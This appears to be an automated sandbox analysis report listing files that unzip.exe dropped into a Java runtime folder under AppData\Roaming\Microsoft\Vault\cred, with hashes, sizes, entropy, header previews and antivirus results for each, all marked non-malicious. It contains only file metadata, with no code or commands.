SSDEEP:	3:YOc6XJKoQAEkBAzprMC9iRFGEuFDKQ1FfJGHmBO8Ly8yA/MGujcWJg6HY4AXe8rg:e8EoQLkBAdrMC9iRVKlFwGBO8By4Hogk
MD5:	59E82B41579AD2E2016D98F191C8D5FF
SHA1:	BD9F7A797E0FCA53892F9FC5EA87727D8DA41DA5
SHA-256:	7D7336CC8FA87C4629EAC7F0EFCBF12E5C975AC9EE44CD1343A0EA68A813DDCA
SHA-512:	32393B417E62F1399C6F1754CC8F3001689593A6B59569885FDFE0F1478018C81222C8B82DADFC0E514659DAA01D819CE79FAA53969BEAEFD438D15C9DF5B9C5
Malicious:	false
Preview:	The licenses for Third Party components included with this product can .be found under the /legal/jdk subdirectory. Each component's license is .available as a separate markdown (.md) file..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\Welcome.html

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	955
Entropy (8bit):	5.091352904992538
Encrypted:	false
SSDEEP:	24:INMTdqcxtK4jXQ5VaJ2gjQo4pDW94hDJn:TTdqIK4jXjJdso4V7f
MD5:	32EA7A6C698749AB066111DBBD20FC0A
SHA1:	1A58120E990AFA868FD5B2F4D14C698BF91866E2
SHA-256:	E30AFEC96C145FEB9B2718B4C9F99A298418D72E38835485D46AFA266475024A
SHA-512:	439A98857A86A7EC69BAD3C7E02C321E9FED0B4AC70E2479D8DD2850AFB565DD6BD63E2DB6BC031C87412F081676BF39EB888CF57FA5516357F1401A90FA03A7
Malicious:	false
Preview:	<html>.<head>.<title>.Welcome to the Java(TM) Platform.</title>.</head>.<body>..<h2>Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Platform</h2>.<p> Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Standard Edition Runtime . Environment. This provides complete runtime support for Java applications. .<p> The runtime environment includes the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> . Plug-in product which supports the Java environment inside web browsers. .<h3>References</h3>.<p>.See the <a href="http://download.oracle.com/javase/7/docs/technotes/guides/plugin/">Java Plug-in</a> product.documentation for more information on using the Java Plug-in product..<p> See the <a href=."http://www.oracle.com/technetwork/java/javase/overview/".>Java Platform</a> web site for . more information on the Java Platform. .<hr>.<font size="-2">.Copyright (c) 2006, 2024, Oracle and/or its affiliates. All rights reserved..</font>.<p>.</body>.</html>.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\API-MS-Win-core-xstate-l2-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12808
Entropy (8bit):	6.849736578066867
Encrypted:	false
SSDEEP:	192:kf5b6WyhWUWGxVA6VWQ42WZNhRSp0X01k9z3APe6T:kf5b6WyhWkxd4hR00R9zOeQ
MD5:	DA15A9998405868E28DE3070B9F4FBEC
SHA1:	41084764A54D696F9D8179F2E6D3D61375EAF428
SHA-256:	2F4A86FB6C1ED35D38250812CCC6B982F18441F3AA2130244E478EADD19D1B2F
SHA-512:	8673293F75519C0367F91B553A4EF2E39257FC68B3145F4019659C5F7CF6A885E0CEA2AF9C68BB9DEE8AC1590297AF7E3C81A775DD5816318AF98A22BD93AE74
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....M............!......................... ...............................@......S.....@.........................`................0...................&..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\JAWTAccessBridge-32.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20608
Entropy (8bit):	6.680418368253317
Encrypted:	false
SSDEEP:	384:751CoJhDgjj0EWpGuniIYi1oztvYpAM+o/8E9VF0NylEwN:6orD3E4GunvYii6pAMxkEX
MD5:	3961ECD2FE06E7968D4C681603DD32EA
SHA1:	0005005E7037A4E697236AA65A125A9DA06C5A2F
SHA-256:	C3EA8ED1C20832D01A002A1937076100FD298129C63717D3090E04703AEC0073
SHA-512:	FDFCF8D733626F0EDFFEF1F14CE7112E97157131354E90B81769E91FF762B627C50E2B8478C6462912263D47AB97BDB514B28AFD9FB6FAFD0E5F5CF12EC1172F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~...~...~....R..~..E....~..E....~..E....~..E....~.......~......~...~...~.......~.......~....>..~.......~..Rich.~..........PE..L....^.f...........!...$..................... ...............................`............@..........................%.......&..d....@..x............(...(...P..@...h!..T............................ ..@............ ..l............................text...k........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc..@....P.......&..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\JavaAccessBridge-32.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	141440
Entropy (8bit):	6.51844899851894
Encrypted:	false
SSDEEP:	3072:Zo6gHSRkrzuwaiEKrK57izD0O/7NY7wYLtyLdwFxnBiKzXHAE/qnvRhGmPt1SRMg:O6qRpD0g0WSRMUn
MD5:	824ACC3A42202E4D3DD370B22CD63D62
SHA1:	25875A717038765DDEE0E2CE80D8DE3A1028E38E
SHA-256:	2F0461FE650782693269848C844FC1DE70E8EE5D3120B420059674172A232DC8
SHA-512:	0F919BC3D9543EEAE548D771CBB681CC9FB48C47E20691601416EEC8BE5FA04F57CB9AEB300729D1B99835C7944AE54FA705DE910A3884812651A575B1EE8B71
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............J..J..J..~J..Jv..K..Jv..K...Jv..K..Jv..K..J...K..J..J...J...K..J...K..J...J..J...K..JRich..J........................PE..L...}^.f...........!...$.....(...............................................0......n.....@.................................h...........x................(... ......H...T...............................@...............$............................text............................... ..`.rdata..............................@..@.data...4...........................@....rsrc...x...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\WindowsAccessBridge-32.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	178816
Entropy (8bit):	6.744908727637245
Encrypted:	false
SSDEEP:	3072:u95UsQNL5+axM5um+gByTAOYFlP/hBZmekJSVEZ2Qr10yta:u9asQNgum+CyTAp/ZyTB5a
MD5:	4ED218A4499B4EB1D68EA3FE7A10075B
SHA1:	70DD704F3649826188772C1BE2C2BFC96AF8DEBB
SHA-256:	1B31B0E530FB58C70BD4EE4ABC367679F3C7EB1C3D23FAA4B4631A638BDBB287
SHA-512:	C1A69F4260DF644561E9806E7D99B5662360510AE252706D5D2D6C6159C4FF40D99701F5C3A4A16A15D30E79C03269E6B686C5745DD951F839913EE243C57D36
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........1n.._=.._=.._=..\<.._=..Z<2._=..[<.._=..[<.._=..\<.._=..Z<.._=..^<.._=..^=!._=..Z<.._=.._<.._=..=.._=..]<.._=Rich.._=........PE..L...}^.f...........!...$.............t....................................................@.........................Pl..D....z..<........................(..........p]..T............................\..@...............`............................text.............................. ..`.rdata..............................@..@.data................j..............@....rsrc................t..............@..@.reloc...............\|..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-console-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13280
Entropy (8bit):	6.804329559920602
Encrypted:	false
SSDEEP:	192:tx4xMWyhWWhWGxVA6VWQ4OWSel6O2dPaIAX01k9z3A0DeaP:b4aWyhWOxdrOOP5AR9zhCaP
MD5:	5D2CBB1C4758445C7D8C44B3E2CE79B2
SHA1:	9E5AC998EEF64B916566DCD2C8C9A6536DF86EA4
SHA-256:	631773623BC4A569BF8E36C403297D16324DB244896CCBC8DE387ED2D1A32823
SHA-512:	DE4809872AC6E91B8E77F689D6FC34625DECCD1250BEB39E7BEE71D22EAE192D216E772D0EB69612484AF5885ED4F87360C8744373AF239BE6288844EF7F051C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L...(%.............!......................... ...............................@............@.........................`...+............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-console-l1-2-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13304
Entropy (8bit):	6.825003064473654
Encrypted:	false
SSDEEP:	192:hh8cWyhW1WvkJ0f5AbVWQ4mWz7spaxgV8FGecX01k9z3AVqVGvtz:9WyhWVaabUspDHR9zmq4z
MD5:	1A48669DBD780B32ED84472CC65DCB9D
SHA1:	9A6E0FFB76CCC3080BB935C364FDE54878E30331
SHA-256:	9AB7CB997B8BF5397F1228EEB20135AC2EA27E09E8144916FA2A3D22E397DE7A
SHA-512:	5188EE44C710E89CA39703A417A75503842D3EB53FE242093F669D77401E1324A8E010521C8C90ECDD9DFECA62E88123D738AEDF788429ACC551E6FAA8771905
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L.....W...........!......................... ...............................@....../d....@.........................`................0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-datetime-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12808
Entropy (8bit):	6.805267732175442
Encrypted:	false
SSDEEP:	192:UiWyhWCWGxVA6VWQ4mWtgE2yUs+OX01k9z3AvqJSM:UiWyhWmxdy2iR9z9QM
MD5:	217BC8404C7CA42AD7DAF399F6DC1A39
SHA1:	53C72DA22E03625BA4D87BC917D506B007EDDC24
SHA-256:	22918AF625EBFA440A212F5274BB62E01D08B405543019E370B0B567500C9CA3
SHA-512:	951E1EF5FFA4A058745A7DEB474D7E638147E3DFAEB3232E02A182EE7B9B17426003033B22ABCF82FA2FB04EDD5C4875C6AC9F487C9F458FEE63194572555C09
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L.....Y............!......................... ...............................@.......H....@.........................`................0...................&..............T............................................................................text...p........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-debug-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12768
Entropy (8bit):	6.8124344358607996
Encrypted:	false
SSDEEP:	192:3VWyhWoqWGxVA6VWQ4OWbiaSzO2dPaIAX01k9z3A0Dea5:FWyhWRxdJaKOOP5AR9zhCa
MD5:	BC8657C60CA15E8C70CBE40F5EC96A0E
SHA1:	B3A4442D45CBD3BD1D953EDDCB3250685A81D802
SHA-256:	35BF50551F0E95DBDFDC4145D0AE3AE9CC893EA606E270F4F6D6F422757F7CA7
SHA-512:	DC3500D89B3B186B2541F8FB568FFB498B0A02ED496BD55782C6DE14D6908956A76B2AC3ADB2EAA814703EA01B393EB8DD960B3296C6905B97A450E597C3AA0E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L...i..............!......................... ...............................@.......I....@.........................`................0...................%..............T............................................................................text...{........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-errorhandling-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12768
Entropy (8bit):	6.870452997412354
Encrypted:	false
SSDEEP:	192:0b+mxD3PWyhW8WGxVA6VWQ4OWaz/+O2dPaIAX01k9z3A0DeatQ:0b+UWyhW8xd4OOP5AR9zhCat
MD5:	D7C9282FF0776399C24D431860D83CAE
SHA1:	24DD8777A6FCD2B440E92CEA45B0EED515D2BB8F
SHA-256:	E11ACDE675CC13656956797DE43FCDC03C700109BA3E48FE39B56360746F901A
SHA-512:	0F78EF1E8F52598E40ACA4FFFE65CC3FF7CDA8B9C34B0AC099B552FD260E181989D6BDA3A929398A587EED744763C42BEADAB8DC380191738913DBADF87E4E60
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L......N...........!......................... ...............................@......J.....@.........................`................0...................%..............T............................................................................text...&........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-fibers-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12768
Entropy (8bit):	6.790933703077586
Encrypted:	false
SSDEEP:	192:zaVWyhWRWGxVA6VWQ4aWHeyAmm2oRanX01k9z3AXmm8ecX:zMWyhW1xdWzoRoR9zm/C
MD5:	C7D7F53EE5BE53321E50D8D7EC37FEB8
SHA1:	889649FB99E93E4E6113F973F948F6CA3296D312
SHA-256:	A3D5C9CBFAB26DE7A56C83E9B45785BA2C609350B2F7C75AA4453B4242BE9539
SHA-512:	EF676001A1C52F61A54413C974D5B1789F63D75DA45C79A54E2A61F07EE512A0E81619B1023FC46D8E32D354BD7CF53D8B9BD49BC00554C68D45B23349756D12
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....3j............!......................... ...............................@.......~....@.........................`................0...................%..............T............................................................................text...H........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-file-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16352
Entropy (8bit):	6.7318478041009815
Encrypted:	false
SSDEEP:	192:0SYPvVX8rFTsdWyhWDWGxVA6VWQ4OWvBgIO2dPaIAX01k9z3A0Deay:CPvVX3WyhWzxdqOOP5AR9zhCa
MD5:	9AD4C3E06054832865575ED9B102F17B
SHA1:	56E8D9C3D8780E37E52A7776174366001B2FF650
SHA-256:	610E14575B31E27285D6425A409EE9623118F1EA4791C0EAD7DA5600BE330402
SHA-512:	BC45291260FAAB87BD054572279AB1447CCD62995BB49E37E07958E50E7DF0A584C7CEFC0EDB19CD19E23EC05E1D20F486D7C49C260B27A3EB757A7505E5CEBA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L..._~.h...........!.........................0...............................P............@.........................`................@...................%..............T............................................................................text...g........................... ..`.data...@....0......................@....rsrc........@......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-file-l1-2-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12752
Entropy (8bit):	6.823275915740232
Encrypted:	false
SSDEEP:	192:tWyhWUWvkJ0f5AbVWQ4GWwTL9Zuzwnh5EHX01k9z3AnY345Cc:tWyhWgaab5Zr7EHR9zX2
MD5:	32AD583470A974251E2D4C00BD97875F
SHA1:	993DD5E1DBE93879A2D563110570C55F7952D3AF
SHA-256:	77C69B1766CC8E96955ADBA0E00CB1DD705B8B8080D67529192700DB6F2AC7BA
SHA-512:	E1887582A7EEFAEBD9D540FCF3605A9D76FE4BD2641FB99CF5368C131FCDD8BCCB0A27D8CCD39DA99F0B301E244FCEA10A91EA17489D7AE2FD6B1A3319C4B0E4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....Y.............!......................... ...............................@......f_....@.........................`...L............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-file-l2-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12768
Entropy (8bit):	6.918246121533452
Encrypted:	false
SSDEEP:	192:tWyhWlWGxVA6VWQ4aWetqSGAmm2oRanX01k9z3AXmh6iTvde:tWyhWxxdVGzoRoR9zmO6M0
MD5:	7D7DF6FAB0255F39BA27C8F84ECDBB99
SHA1:	D7D31F47FD44C4D3EE0FEA89F49FBD128BBD4629
SHA-256:	343340CB6A4B00B0E757AF0D965D87DD1655A1F9D6D198F32B32C3119CA62071
SHA-512:	BF7C229747C26671AF6B6807198CDBCCF853AEC072F7C0F1C4E584A83A32E9E9189BB6EFA556DE2F69EE1D10081C99F8F4E4A2716AF0235A1AB33BD87BFC2065
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L...B..-...........!......................... ...............................@......?.....@.........................`................0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-handle-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12768
Entropy (8bit):	6.8377139259508315
Encrypted:	false
SSDEEP:	192:6WyhWUWGxVA6VWQ4OWMgjUUXO2dPaIAX01k9z3A0DeaF0C:6WyhWkxdD0jOOP5AR9zhCa
MD5:	B5226A5EECA3AB68C2761BAD02F3B3F0
SHA1:	957BC7F75039AA0DDBC5A6E7E0D72447E4C6BE2F
SHA-256:	01E50955988D4567E3B940FD89BD05817E2ECD6C1C259EA6140C19E7ED42EDDA
SHA-512:	5AAC9BC59933645C377867197A76F2101BD536628337D3718F3A5E827784F6AC00F2D6D5A59044FF86ACB030EC972BDAA27278527A2F0843105E04B85EA9D399
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L.....8............!......................... ...............................@......%.....@.........................`..._............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13264
Entropy (8bit):	6.781486305003386
Encrypted:	false
SSDEEP:	192:4laWyhWUWvkJ0f5AbVWQ4aWqq9+rWg5rH0BJhHX01k9z3AyD9tLJ9f8:4laWyhWgaabvrdVUB3R9z35tPE
MD5:	39786BCBF2B365E6A253E958B1157081
SHA1:	CBF36E2791068E1DB2AE11692EF035CAC69DAF2C
SHA-256:	23016ADBEEA8672941659C636859FB7BD52593C2F3888FFBBF102B5716AE68BB
SHA-512:	30AECCB8CE24FC3F6BD30F6B591BE7439E014156530FBA2F1F5B0845957CD715ED3F329E18FB9EC3C539097D76D65A8C92667BEB041901E8A734FF48B967F5AC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L.....O............!......................... ...............................@......&"....@.........................`................0...................%..............T............................................................................text...h........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-interlocked-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13264
Entropy (8bit):	6.817593449437818
Encrypted:	false
SSDEEP:	192:ud/YsFgWyhW8WvkJ0f5AbVWQ4OWi0NKD1Y6uHX01k9z3A6RLWiv:YYsFgWyhW4aab1DeZR9zrLlv
MD5:	1FF0FFB76793EA2BC6E3A9CE74AEF62F
SHA1:	55D78408F9DA5780BF33C4216EB971E7FE2478A5
SHA-256:	D1B513B7ED5A8474AA90DB271549B8491F42CEDE977022C32FA38C7F2EAE3D95
SHA-512:	CADF9DDECCD993E69C5CD0AC3FD5E1BA020EF3518643DE0246AA322000356FDE378484E34A7389756BC6E57E21845162C3146687A9D22B5C3A87E7A0BD09AC76
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L...^.............!......................... ...............................@............@.........................`...Y............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-libraryloader-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13792
Entropy (8bit):	6.781981608588263
Encrypted:	false
SSDEEP:	192:wxvuBL3BBLIWyhW1WGxVA6VWQ4aWGWmFAmm2oRanX01k9z3AXm1sn6XTE:evuBL3BKWyhWhxdQmNzoRoR9zmF6jE
MD5:	59EEE1E85C3F74156B3A7452D5FE27DD
SHA1:	A2F26FFE188B3A51788838E6B067102CAE46465A
SHA-256:	6482D86F0CD5100FE0C966D3234ADDEED57A6555FF94B13F5D2397344D1852BD
SHA-512:	7E97F71904B244E6A8C22D9621A0E1ABB3A88D583040468C5B78EADF212424E0D28BE78DE980B2631757480E30981DD3EFDAEB44647488A026F2F535D209D414
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L...@Z.............!......................... ...............................@............@.........................`................0...................%..............T............................................................................text...n........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-localization-l1-2-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15880
Entropy (8bit):	6.701933870156211
Encrypted:	false
SSDEEP:	384:iOMw3zdp3bwjGzue9/0jCRrndb1WyhW0xdxbI+R9zFa:iOMwBprwjGzue9/0jCRrndbfrX0i9zA
MD5:	ACD8436E7A8E0D888C615B2CBBDBD644
SHA1:	D0892B4F53885392D7B0DC3F69222FD4BA4D67E5
SHA-256:	945107E11CBF5C099F176240DF1EA378BAC3ABDFEDD52F8430C2EF4AD40B1847
SHA-512:	20B0D13FFFE553F4BC4952E553D25674D4969E5C08F8DBD1E3FCED67C3FF652F627C4D177BCB67498AAF60DAB02EE9BE37790C3A3AE2C2772D7E8FB406605812
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L...GQ.............!......................... ...............................@............@.........................`................0...................&..............T............................................................................text...'........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-memory-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13264
Entropy (8bit):	6.815129244282585
Encrypted:	false
SSDEEP:	192:nxZWyhWVWvkJ0f5AbVWQ4OWWlLF+gCxUaNlA4ZQWHX01k9z3AwTj+B:xZWyhW1aabjRCxDNaiHR9zbM
MD5:	86D13BF01716F917E0F896A75A937CF5
SHA1:	3DE81B3A722CD875C563245268F1D16F82A1EFB4
SHA-256:	21DB05A4D41E33A07DF5F4BCB92DBF377513009E799B70E4FD646085439398BF
SHA-512:	127EE80B5389F57254827DA6BE1AA0A4BF478B8B977E3B4A7666E78AAE2EFBFEBF5241AB1ED049BF6EAE179214AD18C05E1A29B84A5E95F1D26091052D26EFAB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....P^5...........!......................... ...............................@............@.........................`...l............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-namedpipe-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12768
Entropy (8bit):	6.919959866626488
Encrypted:	false
SSDEEP:	192:BWyhWdWGxVA6VWQ4aWfsrAmm2oRanX01k9z3AXm1N2jU:BWyhW5xdlnzoRoR9zm+0A
MD5:	9CBA1E2329CA916BFAD1E6DDC08E8D71
SHA1:	CA452686C8D33F65E8BE9D7C45AC8087135B948D
SHA-256:	77F90A7899AB187436A3BFABB8F16CDD928159453553BF803B47DD55AE84D4A5
SHA-512:	F6C1EBC20A7A9865DB12AF8FC2894EC73583A46BB27C7A617D10E39F5E88E5F3DB16EE2746CF98527E4C4D5D32A7C9912605B37880AD4C61A42B579D99D7B20C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
